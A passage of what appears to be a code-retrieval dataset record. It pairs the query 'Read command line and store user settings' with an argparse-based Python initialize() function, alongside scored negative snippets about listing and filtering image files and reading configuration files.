re.match(r'cag01est2400\\d{4}-\\d{2}-\\d{2}_\\d{2}:\\d{2}:\\d{2}.png', file_name):\n file_timestamp = datetime.datetime.strptime(\n file_name, 'cag01est2400%Y-%m-%d_%H:%M:%S.png')\n if file_timestamp > last_timestamp:\n return True\n else:\n return False\n else:\n return False\n\n return list(filter(_iterator, file_list))", "def list_all_image(path, valid_exts=VALID_IMAGE_EXTS):\n for filename in os.listdir(path):\n bname, ext = os.path.splitext(filename)\n if ext.lower() not in VALID_IMAGE_EXTS:\n continue\n filepath = os.path.join(path, filename)\n yield strutils.decode(filepath)", "def populate_image_lists():\r\n with os.scandir(os.path.join(dir_path, \"inputs\", \"type_a\")) as filepaths:\r\n for path in filepaths:\r\n extension = os.path.splitext(path)[1].lower()\r\n if extension == \".png\" or extension == \".jpg\":\r\n images_a.append(path.path)\r\n with os.scandir(os.path.join(dir_path, \"inputs\", \"type_b\")) as filepaths:\r\n for path in filepaths:\r\n extension = os.path.splitext(path)[1].lower()\r\n if extension == \".png\" or extension == \".jpg\":\r\n images_b.append(path.path)", "def ExcludeFiles(filters, files):\n if not filters:\n return files\n match = set()\n for file_filter in filters:\n excludes = set(fnmatch.filter(files, file_filter))\n match |= excludes\n return [name for name in files if name not in match]", "def filter(self, filters):", "def preselect(input_files: list) -> list:\n checked_files = []\n for file in input_files:\n if os.path.isfile(file):\n checked_files.append(file)\n\n summary_df = pd.DataFrame(columns=['file', 'size'])\n\n summary_df['file'] = checked_files\n summary_df['size'] = [os.path.getsize(file) for file in checked_files]\n\n summary_df = summary_df[summary_df['size'].duplicated(keep=False)]\n\n return summary_df['file'].tolist()", "def clean_file(filesnames_list, file_type): # so now not needed.\r\n global files_list\r\n files_list = []\r\n global ft_list\r\n ft_list = []\r\n for line in filesnames_list:\r\n s, fileType = line.split('.') # split off file_type here\r\n print(s)\r\n files_list.append(s)\r\n ft_list.append(fileType)\r\n print(files_list)\r\n return (files_list)", "def filter_filenames(filenames, filters, inverse=False):\n out = []\n for filename in filenames:\n for filt in filters:\n if (filt not in filename) + (inverse) == 1:\n break\n else:\n out.append(filename)\n return out", "def extract_microfossils_in_dir(source_dir, destination_dir,\n crop_dims, min_microfossil_size, clean_particles):\n if os.path.isdir(source_dir) is False:\n raise Exception(\"Not a valid source path\")\n if os.path.isdir(destination_dir) is False:\n os.makedirs(destination_dir)\n\n print(\"Currently processing images in dir: {}\".format(source_dir))\n image_extensions = [\".tif\", \".TIF\", \".png\", \".PNG\"]\n sub_dirs = []\n images_in_dir = []\n for file in os.listdir(source_dir):\n if os.path.isdir(os.path.join(source_dir, file)) and os.path.join(source_dir, file) != destination_dir:\n sub_dirs.append(file)\n # If it's an image with the given extensions\n elif reduce((lambda x, y: x or y), [file.endswith(ext) for ext in image_extensions]):\n images_in_dir.append(file)\n\n # Now process the images\n processed_images = 0\n generated_crops = 0\n for image_path in images_in_dir:\n full_image_path = os.path.join(source_dir, image_path)\n grayscale_image = cv2.imread(full_image_path, cv2.IMREAD_GRAYSCALE)\n if grayscale_image is None:\n print(\"Couldn't read image and was skipped: {}\".format(full_image_path))\n continue\n\n unfiltered_crops, filtered_crops = extract_microfossils(grayscale_image, min_microfossil_size,\n crop_dims, clean_particles)\n processed_images += 1\n for idx, crop in enumerate(unfiltered_crops):\n crop_file_name = \"{}_crop_{}_unfiltered.png\".format(os.path.splitext(image_path)[0], idx)\n cv2.imwrite(os.path.join(destination_dir, crop_file_name), crop)\n for idx, crop in enumerate(filtered_crops):\n crop_file_name = \"{}_crop_{}_filtered.png\".format(os.path.splitext(image_path)[0], idx)\n cv2.imwrite(os.path.join(destination_dir, crop_file_name), crop)\n\n generated_crops += len(unfiltered_crops) + len(filtered_crops)\n\n # Recursively apply to all subdirs\n for subdir in sub_dirs:\n source_subdir = os.path.join(source_dir, subdir)\n destination_subdir = os.path.join(destination_dir, subdir)\n sub_processed_images, sub_generated_crops = extract_microfossils_in_dir(source_subdir, destination_subdir,\n crop_dims, min_microfossil_size, clean_particles)\n processed_images += sub_processed_images\n generated_crops += sub_generated_crops\n\n return processed_images, generated_crops", "def filter_valid_data(image_dir, anno_path):\n images = []\n image_path_dict = {}\n image_anno_dict = {}\n if not os.path.isdir(image_dir):\n raise RuntimeError(\"Path given is not valid.\")\n if not os.path.isfile(anno_path):\n raise RuntimeError(\"Annotation file is not valid.\")\n\n with open(anno_path, \"rb\") as f:\n lines = f.readlines()\n for img_id, line in enumerate(lines):\n line_str = line.decode(\"utf-8\").strip()\n line_split = str(line_str).split(' ')\n file_name = line_split[0]\n image_path = os.path.join(image_dir, file_name)\n if os.path.isfile(image_path):\n images.append(img_id)\n image_path_dict[img_id] = image_path\n image_anno_dict[img_id] = anno_parser(line_split[1:])\n\n return images, image_path_dict, image_anno_dict", "def list_image_files(dir, filter=None):\n for entry in os.listdir(dir):\n path = os.path.join(dir, entry)\n if os.path.isdir(path):\n for p in list_image_files(path, filter):\n yield p\n elif any((entry.lower().endswith(ext) for ext in image_exts)):\n if filter and not filter(path):\n continue\n yield path", "def detectFiles(self, input):\n output = []\n if os.path.isfile(input):\n output.append(input)\n else:\n input = os.path.join(input, '*') if os.path.isdir(input) else input\n for file in glob.glob(input):\n output.append(file)\n return output", "def process(self, tile):\n directory = os.path.join(self.Cg_Cfg.output_preprocess, tile.upper())\n print(\"Start speckle filtering: \" + tile.upper())\n year_outcore_list = [\"2019\", \"2018\"]\n year_filter_list = [\"2019\", \"2018\"]\n\n year_outcore_str = \"-\".join(year_outcore_list) # pour les noms de fichiers\n\n filelist_s1des = []\n filelist_s1asc = []\n filelist_s1des_updateoutcore = []\n filelist_s1asc_updateoutcore = []\n # Build the lists of files :\n # - for computing outcores\n # - for filtering\n\n for y in year_outcore_list:\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_DES_???_\" + y + \"????t??????.tif\")):\n filelist_s1des_updateoutcore.append(file_it)\n\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_ASC_???_\" + y + \"????t??????.tif\")):\n filelist_s1asc_updateoutcore.append(file_it)\n\n # Select only 100 images for the outcore dataset (for both ASC and DES outcores)\n filelist_s1des_updateoutcore = filelist_s1des_updateoutcore[:100]\n filelist_s1asc_updateoutcore = filelist_s1asc_updateoutcore[:100]\n\n for y in year_filter_list:\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_DES_???_\" + y + \"????t??????.tif\")):\n filelist_s1des.append(file_it)\n\n for file_it in glob.glob(os.path.join(directory, \"s1?_?????_??_ASC_???_\" + y + \"????t??????.tif\")):\n filelist_s1asc.append(file_it)\n\n print(filelist_s1des)\n print()\n print(filelist_s1asc)\n print()\n\n if self.Cg_Cfg.Reset_outcore:\n processed_files = []\n try:\n os.remove(os.path.join(directory, \"outcore\" + year_filter + \".txt\"))\n except:\n pass\n else:\n try:\n processed_files = \\\n pickle.load(open(os.path.join(directory, \"outcore\" + year_filter + \".txt\")))\n except pickle.PickleError:\n processed_files = []\n\n # Compute the outcores for ASC and DES images\n\n for file_it in processed_files:\n try:\n filelist_s1des_updateoutcore.remove(file_it)\n filelist_s1asc_updateoutcore.remove(file_it)\n except ValueError:\n pass\n\n # Build the strings containing the filenames to be processed\n filelist_s1des_updateoutcore_str = \" \".join(filelist_s1des_updateoutcore)\n filelist_s1asc_updateoutcore_str = \" \".join(filelist_s1asc_updateoutcore)\n filelist_s1des_str = \" \".join(filelist_s1des)\n filelist_s1asc_str = \" \".join(filelist_s1asc)\n\n pids = []\n\n # Adapts the processing ressources to only two processes\n\n ram_per_process = int(self.Cg_Cfg.ram_per_process * self.Cg_Cfg.nb_procs / 2)\n OTBThreads = int(self.Cg_Cfg.OTBThreads * self.Cg_Cfg.nb_procs / 2)\n\n ####### TK\n # On vide la liste des fichiers ASC pour eviter de calculer l'outcore\n filelist_s1asc_updateoutcore = []\n filelist_s1asc = []\n #\n\n if filelist_s1des_updateoutcore:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringOutcore -progress false -inl \"\\\n + filelist_s1des_updateoutcore_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1DES.tif\")\\\n + \" -wr {}\".format(self.Cg_Cfg.Window_radius)\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n if filelist_s1asc_updateoutcore:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringOutcore -progress false -inl \"\\\n + filelist_s1asc_updateoutcore_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1ASC.tif\")\\\n + \" -wr \" + str(self.Cg_Cfg.Window_radius)\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n try:\n os.makedirs(os.path.join(directory, \"filtered\"))\n except os.error:\n pass\n\n title = \"Compute outcore\"\n nb_cmd = len(pids)\n print(title + \"... 0%\")\n while len(pids) > 0:\n\n for i, pid in enumerate(pids):\n status = pid[0].poll()\n if status:\n print(\"Error in pid #\" + str(i) + \" id = \" + str(pid[0]))\n print(pid[1])\n del pids[i]\n break\n\n elif status == 0:\n del pids[i]\n print(title + \"... \" + str(int((nb_cmd - len(pids)) * 100. / nb_cmd)) + \"%\")\n time.sleep(0.2)\n break\n time.sleep(2)\n\n processed_files = processed_files + filelist_s1des_updateoutcore\\\n + filelist_s1asc_updateoutcore\n\n pickle.dump(processed_files, open(os.path.join(directory, \"outcore.txt\"), 'w'))\n\n # Compute the filtered images using the outcores\n\n pids = []\n if filelist_s1des:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringFilter -progress false -inl \"\\\n + filelist_s1des_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1DES.tif\")\\\n + \" -wr \" + str(self.Cg_Cfg.Window_radius) + \" -enl \"\\\n + os.path.join(directory, \"filtered\", \"enl_\" + year_outcore_str + \"_S1DES.tif\")\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n\n if filelist_s1asc:\n command = 'export ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS={};'.format(OTBThreads)\\\n + \"otbcli_MultitempFilteringFilter -progress false -inl \"\\\n + filelist_s1asc_str + \" -oc \"\\\n + os.path.join(directory, \"outcore\" + year_outcore_str + \"_S1ASC.tif\")\\\n + \" -wr \" + str(self.Cg_Cfg.Window_radius) + \" -enl \"\\\n + os.path.join(directory, \"filtered\", \"enl_\" + year_outcore_str + \"_S1ASC.tif\")\\\n + \" -ram {}\".format(str(ram_per_process))\n pids.append([Popen(command, stdout=self.Cg_Cfg.stdoutfile,\n stderr=self.Cg_Cfg.stderrfile, shell=True), command])\n\n title = \"Compute filtered images\"\n nb_cmd = len(pids)\n print(title + \"... 0%\")\n while len(pids) > 0:\n\n for i, pid in enumerate(pids):\n status = pid[0].poll()\n if status:\n print(\"Error in pid #\" + str(i) + \" id = \" + str(pid[0]))\n print(pid[1])\n del pids[i]\n break\n\n elif status == 0:\n del pids[i]\n print(title + \"... \" + str(int((nb_cmd - len(pids)) * 100. / nb_cmd)) + \"%\")\n time.sleep(0.2)\n break\n time.sleep(2)\n\n filtering_directory = os.path.join(directory, 'filtered/')\n for f in os.listdir(filtering_directory):\n fullpath = os.path.join(filtering_directory, f)\n if os.path.isfile(fullpath) and f.startswith('s1') and f.endswith('filtered.tif'):\n dst = gdal.Open(fullpath, gdal.GA_Update)\n dst.SetMetadataItem('FILTERED', 'true')\n dst.SetMetadataItem('FILTERING_WINDOW_RADIUS', str(self.Cg_Cfg.Window_radius))\n dst.SetMetadataItem('FILTERING_PROCESSINGDATE', str(datetime.datetime.now()))", "def clean_spec(input_filepath, output_filepath):\n file_list = glob.glob(input_filepath + '/*')\n file_list.sort()\n features_set = []\n with ShadyBar(f\"Extracting features {input_filepath}...\", max=len(file_list)) as bar:\n for f in file_list:\n interim_data = np.loadtxt(f, delimiter=',', skiprows=1)\n features_set.append(linear_int(interim_data[:, 0], interim_data[:, 1]))\n\n bar.next()\n\n save_feat_files(np.array(features_set), os.path.join(output_filepath, \"peaks_features.pkl\"))", "def _parse_file_path(path, ftype='all'):\n\n # Make sure we have a proper path to the images to use\n if path is None:\n path = os.path.join(os.getcwd(), 'df_utils/beps_data_gen_images')\n else:\n path = os.path.abspath(path)\n\n # Get all files in directory\n file_list = os.listdir(path)\n\n # If no file type specified, return full list\n if ftype == 'all':\n return file_list\n\n # Remove files of type other than the request ftype from the list\n new_file_list = []\n for this_thing in file_list:\n # Make sure it's really a file\n if not os.path.isfile(os.path.join(path, this_thing)):\n continue\n\n split = os.path.splitext(this_thing)\n ext = split[1]\n if ext == ftype:\n new_file_list.append(os.path.join(path, this_thing))\n\n return new_file_list", "def threshold_images(image_path, image_format=\"tif\", thresh_val=128, thresh_max=255):\n masks = glob.glob(image_path + \"/*.\" + image_format)\n masks_arrays = [cv2.imread(x, cv2.IMREAD_GRAYSCALE) for x in masks]\n thresholded = [cv2.threshold(x, thresh_val, thresh_max,\n cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1] for x in masks_arrays]\n return thresholded", "def preprocess_image(self, batched_inputs):\n images = [x[\"image\"].float().to(self.device) for x in batched_inputs]\n images = [self.normalizer(img) for img in images]\n images = ImageList.from_tensors(images, self.backbone.size_divisibility)\n return images", "def get_image_list(source_dir):\n\n dir_list = os.path.os.listdir(source_dir)\n# print(dir_list)\n image_list = []\n os.chdir(source_dir)\n for file in dir_list:\n print(\"Inspecting.... : {}\".format(file))\n\n try:\n if Image.open(file).format:\n image_list.append(file)\n print(\"{} : is an image\".format(file))\n except Exception as e:\n print(\"{} : failed the imageness test.i \\n {}\".format(file, e))\n continue\n\n# print(image_list)\n return image_list", "def file_filter(file_name):\n extensions = get_setting('file_extensions', [])\n if not extensions: return True\n return True in [file_name.endswith(ext) for ext in extensions]", "def remove_bad_images(path_images):\n images = sorted(os.listdir(path_images))\n for k in range(len(images)):\n os.remove(path_images + images[k])", "def allowed_file(filename):\n return '.' in filename and \\\n\t filename.rsplit('.', 1)[1] in ALLOWED_IMAGE_EXTENSIONS", "def compress_img():\n in_path = 'output/templates/rgb/'\n out_path = 'output/templates/imgs/'\n names = os.listdir(in_path)\n for i, name in enumerate(names):\n img = cv2.imread(in_path + name, 0)\n if any(np.array(img.shape) > 1000):\n img = cv2.resize(img, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)\n cv2.imwrite(out_path + name, img)\n\n return", "def filter_data(self):\n if(self.filter_classes == []):\n return\n \n filtered_idx = []\n for id in range(len(self.image_ids)):\n anns = self.load_annotations(id)\n found = False\n for ann in anns:\n if ann['label'] in self.filter_classes:\n found = True\n break\n if found:\n filtered_idx.append(id)\n \n self.filtered_ids = [self.image_ids[id] for id in filtered_idx]\n # self.image_ids = self.filtered_ids\n print(\"Number of filtered instances:\", len(self.filtered_ids))", "def batch_analysis(filename: str) -> None:\n \n infile = open(filename, \"r\")\n word_list_new = []\n for line in infile:\n word_list = line.split()\n for word in word_list:\n if word != '':\n word_list_new += [word]\n load_img = load_image(word_list_new[0])\n for filter in range(len(word_list)-2):\n load_img = filter_array(load_img, word_list[filter+2])\n save_as(load_img, word_list_new[1])\n word_list_new = [] #reset the line to empty\n infile.close()\n # Now build the list of distinct words.\n word_list_new = list(word_list)\n return word_list_new", "def filter(self, regex_pattern: str) -> None:\n self._filter_attachment_list(regex_pattern)\n self._filter_url_list(regex_pattern)", "def filter_images(data, split_data):\n all_split_ids = set()\n for split_name, ids in split_data.iteritems():\n all_split_ids.update(ids)\n new_data = []\n for img in data:\n keep = img['id'] in all_split_ids and len(img['regions']) > 0\n if keep:\n new_data.append(img)\n return new_data", "def apply_filter(self, image):\n pass", "def remove_labels_without_images(path_folder):\n\n labels = os.listdir(path_folder + \"LABELS_polar\")\n images = os.listdir(path_folder + \"POLAR\")\n for l in labels:\n name_l = l.split(\".\")\n if name_l[0] + '.tiff' not in images:\n os.remove(path_folder + \"LABELS_polar/\" + l)", "def return_images(directory):\r\n allfiles = os.listdir(directory)\r\n image_list = [im for im in allfiles if '.jpg' in str(im)]\r\n image_list = [directory + im for im in image_list]\r\n return image_list" ]
[ "0.74834895", "0.6394286", "0.6174496", "0.61535", "0.5974321", "0.59707564", "0.59085125", "0.58987886", "0.5869271", "0.5863154", "0.5833285", "0.58235216", "0.57972664", "0.5788407", "0.57858866", "0.57686263", "0.5761519", "0.5749259", "0.57330817", "0.5702307", "0.56877536", "0.5686417", "0.56820834", "0.56610143", "0.5644456", "0.55911654", "0.5588419", "0.5571285", "0.55704826", "0.55704826", "0.55414015", "0.5507616", "0.55073756", "0.55073756", "0.55073756", "0.5494165", "0.5485134", "0.5476125", "0.5472747", "0.54685694", "0.54473907", "0.5433587", "0.5426965", "0.54200023", "0.5416888", "0.5405351", "0.53979677", "0.53937435", "0.53868216", "0.53834885", "0.53760594", "0.5370513", "0.53651404", "0.53651404", "0.53651404", "0.53641576", "0.5362775", "0.53578866", "0.53523856", "0.5343567", "0.5337086", "0.53262895", "0.53254104", "0.53236187", "0.53210634", "0.5304653", "0.5293327", "0.5286686", "0.52854645", "0.52679205", "0.5263676", "0.5262477", "0.5260409", "0.52578336", "0.52343005", "0.5233256", "0.5231809", "0.5231759", "0.5224353", "0.5216679", "0.5210734", "0.52091384", "0.520799", "0.5196606", "0.51965076", "0.5192612", "0.51863855", "0.51846534", "0.5174986", "0.5174933", "0.5174872", "0.5173262", "0.5156537", "0.5154284", "0.51463306", "0.5139734", "0.51385283", "0.51385266", "0.51354784", "0.5133356" ]
0.6194896
2
Read command line and store user settings.
def initialize(): parser = build_arg_parser() par = parser.parse_known_args()[0] # Main arguments. set('run_mode', par.run_mode) set('input_files', par.image) # Sub-parser specific arguments. if par.run_mode == 'train': set('batch_size', par.batch_size) set('drop', par.drop) set('epochs', par.epochs) set('model', par.model) set('level', par.level) set('vfrac', par.vfrac) set('data_augm', par.data_augm) set('summary', par.summary) set('outdir', par.outdir) # Parameters associated with super-resolution. set('super_resolution', par.super_resolution) set('generator', par.generator) set('discriminator', par.discriminator) elif par.run_mode == 'predict': set('tile_edge', par.edge) set('model', par.model) set('save_conv2d_kernels', par.save_conv2d_kernels) set('save_conv2d_outputs', par.save_conv2d_outputs) set('colormap', par.colormap) # Parameters associated with super-resolution. set('super_resolution', par.super_resolution) set('generator', par.generator) elif par.run_mode == 'diagnose': set('model', par.model) else: pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_settings_from_cli():\n load_user_from_cli()\n load_local_contacts()", "def load_user_from_cli():\n load_user()\n\n # Flag for checking if there is a need to update the config by writing to a file\n update = False\n\n if SETTINGS[\"user\"][\"name\"] is None:\n SETTINGS[\"user\"][\"name\"] = config_user_name()\n update = True\n\n email_config = SETTINGS[\"user\"][\"email\"]\n if email_config[\"address\"] is None:\n email_config[\"address\"] = config_email_address()\n update = True\n\n if email_config[\"host\"] is None:\n email_config = config_email_host(email_config)\n update = True\n\n if SETTINGS[\"user\"][\"language\"] is None:\n SETTINGS[\"user\"][\"language\"] = config_model_language(get_model_languages())\n update = True\n\n if SETTINGS[\"user\"][\"language_version\"] is None:\n SETTINGS[\"user\"][\"language_version\"] = choose_version(get_language_versions(SETTINGS[\"user\"][\"language\"]))\n update = True\n\n SETTINGS[\"user\"][\"email\"] = email_config\n if update:\n update_settings(\"../config/user\", SETTINGS[\"user\"])\n print(\"User config updated\")\n\n load_nlp_models_config(SETTINGS[\"user\"][\"language\"], SETTINGS[\"user\"][\"language_version\"])\n\n load_meeting_settings()", "def init():\n args = []\n with open(\"settings.txt\", \"r\") as reader:\n for line in reader:\n args.append(line)\n return args", "def do_config(self, args):\n if args.set == \"store_password\":\n put_config_value(\"store_password\", True if args.value.lower() == \"yes\" else False)\n elif args.set == \"password\":\n put_config_value(\"password\", args.value)\n elif args.set == \"username\":\n put_config_value(\"username\", args.value)\n else:\n print(\"Invalid option\")", "def parse_args(self, argv):\n\t\tself.argv={'user': argv[1]}", "def read_settings(self):\n self.settings = read_settings(self.settings_path)", "def init(args):\n # reading existing config file, convert to configparser object\n config = config_from_file()\n config_ = configparser.ConfigParser()\n config_.add_section('osf')\n if 'username' not in config.keys():\n config_.set('osf', 'username', '')\n else:\n config_.set('osf', 'username', config['username'])\n if 'project' not in config.keys():\n config_.set('osf', 'project', '')\n else:\n config_.set('osf', 'project', config['project'])\n\n # now we can start asking for new values\n print('Provide a username for the config file [current username: {}]:'.format(\n config_.get('osf', 'username')))\n username = input()\n if username:\n config_.set('osf', 'username', username)\n\n print('Provide a project for the config file [current project: {}]:'.format(\n config_.get('osf', 'project')))\n project = input()\n if project:\n config_.set('osf', 'project', project)\n\n cfgfile = open(\".osfcli.config\", \"w\")\n config_.write(cfgfile)\n cfgfile.close()", "def __init__(self, filename=None, use_argv=True):\n self._init_filename = filename\n if use_argv:\n self.options, self.args = [self.get_parser().parse_args()] * 2\n else:\n self.options = self.args = None\n self._wrapped = self.load(file=self.settings_file)\n # build a special dynamic section for things the user wants,\n # ie, things that have been passed into the option\n # parser but are not useful in the .ini\n if not self.get_section('user'):\n self['user'] = {}\n if self.options is not None:\n self['user']['shell'] = self.options.shell and 'true' or ''\n else:\n self['user']['shell'] = ''", "def cli(ctx, assignment):\n\n config_dir = click.get_app_dir(APP_NAME, force_posix=True, roaming=True)\n mkdir_p(config_dir)\n\n config_path = os.path.join(config_dir, USER_CONFIG)\n\n try:\n with click.open_file(config_path, 'r') as cfg_file:\n ctx.obj = ZucchiniState.load_from_config(cfg_file, config_dir,\n assignment)\n except: # noqa\n # TODO: Maybe better handling here, is it corrupt or nonexistent?\n click.echo(\"We need to set up your configuration before doing any \"\n \"other work.\")\n setup_handler()\n click.echo(\"Configuration set up successfully! Please retry your \"\n \"original command now.\")\n raise SystemExit() # TODO: Use better exception\n # TODO: The way we handle this here makes it impossible to have a setup\n # or reset command. We kinda need one.", "def readSettingsFile():\n\tglobal logfile\n\tglobal backupCount\n\tglobal maxBytes\n\tglobal debug\n\t\n\tif SettingsFile.getOptionString(INI_Section,\"logfile\"):\n\t\tlogfile = SettingsFile.getOptionString(INI_Section,\"logfile\")\n\tif SettingsFile.getOptionInt(INI_Section,\"maxBytes\"):\n\t\tmaxBytes = SettingsFile.getOptionInt(INI_Section,\"maxBytes\")\n\tif SettingsFile.getOptionInt(INI_Section,\"backupCount\"):\n\t\tbackupCount = SettingsFile.getOptionInt(INI_Section,\"backupCount\")\n\tif SettingsFile.getOptionBoolean(INI_Section,\"debug\"):\n\t\tdebug = SettingsFile.getOptionBoolean(INI_Section,\"debug\")\n\t#endif", "def read_settings(args):\r\n # Default values\r\n state = 48\r\n district = 7\r\n leg_body = 'US-REP'\r\n census_year = '2016'\r\n election_year = '2018'\r\n voting_precincts = None\r\n voting_results = None\r\n \r\n # Set values in settings.ini\r\n settings = configparser.ConfigParser()\r\n settings.read('settings.ini') # change example.settings.ini to settings.ini\r\n\r\n # Census API Key\r\n census_api_key = settings.get( 'census', 'CENSUS_API_KEY' )\r\n\r\n if args.census_year:\r\n census_year=args.census_year\r\n if args.election_year:\r\n election_year=args.election_year\r\n if args.state:\r\n state = args.state\r\n if args.district:\r\n district = args.district\r\n if args.leg_body:\r\n leg_body = args.leg_body\r\n if args.voting_precincts:\r\n voting_precincts = args.voting_precincts\r\n if args.voting_results:\r\n voting_results = args.voting_results\r\n\r\n settings_dict = { \r\n \"census_api_key\": census_api_key,\r\n \"state\": state,\r\n \"district\": district,\r\n \"leg_body\": leg_body,\r\n \"census_year\": census_year,\r\n \"election_year\": election_year,\r\n \"voting_precincts\": voting_precincts,\r\n \"voting_results\": voting_results\r\n }\r\n\r\n return settings_dict", "def loadSettings():\r\n try:\r\n settingsFile = open(sys.argv[1], \"r\")\r\n except IOError:\r\n logging.exception(\"Error opening settings.\")\r\n exitApp()\r\n \r\n settingStr = settingsFile.read()\r\n settingsFile.close()\r\n \r\n try:\r\n settings = json.loads(settingStr)\r\n except ValueError:\r\n logging.exception(\"Error parsing settings.\")\r\n exitApp()\r\n \r\n # Check integrity\r\n if (len(settings[\"reddit_username\"]) == 0):\r\n logging.critical(\"Reddit username not set.\")\r\n exitApp()\r\n \r\n if (len(settings[\"reddit_password\"]) == 0):\r\n logging.critical(\"Reddit password not set.\")\r\n exitApp()\r\n \r\n if (len(settings[\"reddit_subreddit\"]) == 0):\r\n logging.critical(\"Subreddit not set.\")\r\n exitApp()\r\n \r\n if (len(settings[\"reddit_ua\"]) == 0):\r\n logging.critical(\"Reddit bot user agent not set.\")\r\n exitApp()\r\n \r\n settings[\"repost_protection\"] = bool(settings[\"repost_protection\"])\r\n \r\n return settings", "def cli(ctx, root):\n try:\n ctx.obj = create_initial_context(root)\n except SettingsBroken as e:\n click.echo(\n 'Failed to read the settings file: %s' % str(e),\n err=True\n )\n exit(1)", "def readopts(self):\n parser = OptionParser()\n parser.add_option(\"--dbname\", action=\"store\", type=\"string\", dest=\"dbname\", default=None)\n\n parser.add_option(\"--user\",\n action=\"store\",\n type=\"string\",\n dest=\"user\",\n default=None)\n\n parser.add_option(\"--password\",\n action=\"store\",\n type=\"string\",\n dest=\"password\",\n default=None)\n\n parser.add_option(\"--host\",\n action=\"store\",\n type=\"string\",\n dest=\"host\",\n default=None)\n\n parser.add_option(\"--port\",\n action=\"store\",\n type=\"string\",\n dest=\"port\",\n default=None)\n\n (options, args) = parser.parse_args()\n\n if options.dbname is None:\n print \"dbname is mandatory\"\n exit(1)\n\n conf = \"dbname=%s\" % options.dbname\n for parm in ['user', 'password', 'host', 'port']:\n if options.__dict__[parm] is not None:\n conf = \"%s %s=%s\" % (conf, parm, options.__dict__[parm])\n return conf", "def setup(self):\n messages = [\n \"Please enter you Holberton email: \",\n \"Please enter your Holberton password (don't worry passwd will be encrypted): \",\n \"Please enter full path where you want to save future projects: \"\n ]\n settings_ini_variables = [\"username\", 'password', 'location']\n\n settings_ini = {}\n for msg, var in zip(messages, settings_ini_variables):\n user_input = str(input(msg))\n\n if var == \"location\":\n while not os.path.exists(user_input):\n print(\"[!]: SUPPLIED PATH DOES NOT EXIST.\")\n user_input = str(input(msg))\n settings_ini[var] = encrypted(user_input) if var == \"password\" else user_input\n\n self.write_to_file(**settings_ini)", "def _set_credentials(args):\n if hasattr(args, 'username') and hasattr(args, 'apikey') \\\n and args.username and args.apikey:\n config.update({'username': args.username})\n config.update({'apikey': args.apikey})\n elif os.path.exists(os.path.expanduser('~/.jarvice.cfg')):\n CParser = configparser.ConfigParser()\n CParser.read([os.path.expanduser('~/.jarvice.cfg'), ])\n config.update({'username': CParser.get('auth', 'username')})\n config.update({'apikey': CParser.get('auth', 'apikey')})\n else:\n sys.stderr.write(\"username and apikey must be passed as arguments \" \n \"or set in ~/.jarvice.cfg\")\n sys.exit(1)", "def settings_init(self):\n config_console = configparser.ConfigParser()\n config_console.read(CONFIG_FILE_NAME)\n self.logmode = config_console[\"LOG\"][\"log_mode\"]", "def load_default_user_configs(args):\n # Skip any imported keys from future\n import __future__ as ff\n future_keys = dir(ff)\n # Load default settings\n import pythiaplotter.default_config as dc\n default_settings = {k: getattr(dc, k) for k in dir(dc)\n if k not in future_keys and not k.startswith(\"_\")}\n args.__dict__.update(default_settings) # argparse.Namespace doesn't like update() or new keys\n # Load user config\n if args.configFile:\n if not helpr.check_file_exists(args.configFile):\n raise IOError(\"Configuration file %s does not exist\" % args.configFile)\n cc = load_source(\"cc\", args.configFile)\n custom_settings = {k: getattr(cc, k) for k in dir(cc)\n if k not in future_keys and not k.startswith(\"_\")}\n args.__dict__.update(custom_settings)", "def load():\n global tinyConfig\n if not tinyConfig:\n tinyConfig = CmdArgs()\n return tinyConfig", "def main():\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n get_user_config()", "def config_from_user(self):\n if self.configDict is not None and len(self.configDict.keys()) > 0:\n for key in sorted(self.configDict.keys()):\n tempInput = input(\n 'set ' + key + '(currently ' + str(self.configDict[key]) + ') to :')\n if tempInput != '':\n self.configDict[key] = tempInput\n else:\n print ('starting with a new empty dictionary...')\n self.configDict = {}\n while True:\n key = input('Enter a new Key, or -1 to quit:')\n if key == '-1' or key == '':\n break\n else:\n value = input('Enter a value for ' + key + ':')\n self.configDict.update({key: value})", "def read_user_input(self):\n\n self.commandline = raw_input(\"Enter the string you want to parse\\n\")", "def readOptions(self):\n get = command_line.CommandLineParser().get_option\n if get('nosplash')!=None:\n self.temp_configuration.showSplash = bool(get('nosplash'))\n if get('debugsignals')!=None:\n self.temp_configuration.debugSignals = bool(get('debugsignals'))\n if get('dotVistrails')!=None:\n self.temp_configuration.dotVistrails = get('dotVistrails')\n #in theory this should never happen because core.configuration.default()\n #should have done this already\n #if not self.configuration.check('dotVistrails'):\n # self.configuration.dotVistrails = system.default_dot_vistrails()\n # self.temp_configuration.dotVistrails = system.default_dot_vistrails()\n if get('multiheads')!=None:\n self.temp_configuration.multiHeads = bool(get('multiheads'))\n if get('maximized')!=None:\n self.temp_configuration.maximizeWindows = bool(get('maximized'))\n if get('movies')!=None:\n self.temp_configuration.showMovies = bool(get('movies'))\n if get('cache')!=None:\n self.temp_configuration.useCache = 